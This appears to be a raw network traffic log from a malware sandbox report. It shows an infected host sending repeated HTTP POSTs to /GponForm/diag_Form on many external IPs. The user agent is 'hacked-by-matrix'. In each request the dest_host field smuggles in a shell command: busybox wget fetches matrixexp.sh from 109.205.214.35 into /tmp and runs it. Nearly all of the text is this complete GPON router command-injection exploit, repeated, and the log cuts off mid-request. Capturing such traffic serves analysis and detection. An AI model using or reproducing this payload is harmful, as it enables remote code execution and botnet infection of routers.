                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1292192.168.2.1349758212.121.85.100443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715950966 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1293192.168.2.136028842.129.36.55443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715960026 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1294192.168.2.1337292212.132.158.200443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715976000 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1295192.168.2.13377865.168.145.216443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.715996027 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1296192.168.2.13454545.121.179.39443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716013908 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1297192.168.2.133818042.196.69.29443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716022968 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1298192.168.2.1343276118.83.152.10443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716037035 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1299192.168.2.1337250109.222.150.141443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716042042 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1300192.168.2.1345252212.191.98.81443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716058016 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1301192.168.2.1359374109.253.127.110443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716063023 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1302192.168.2.1360372109.63.194.102443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716133118 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1303192.168.2.1339688212.99.66.219443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716140032 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1304192.168.2.134871842.248.34.46443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716171026 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1305192.168.2.13598965.132.142.218443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716171980 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1306192.168.2.1347094212.150.79.158443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716181040 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1307192.168.2.13607085.250.165.122443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716197014 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1308192.168.2.133424842.222.188.88443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716229916 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1309192.168.2.1350974212.183.196.174443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716242075 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1310192.168.2.1355070212.165.191.253443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716269016 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1311192.168.2.1343122109.109.145.55443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716276884 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1312192.168.2.1346910118.6.163.141443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716290951 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1313192.168.2.133464642.9.217.214443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716310024 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1314192.168.2.1351744212.220.217.87443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716336012 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
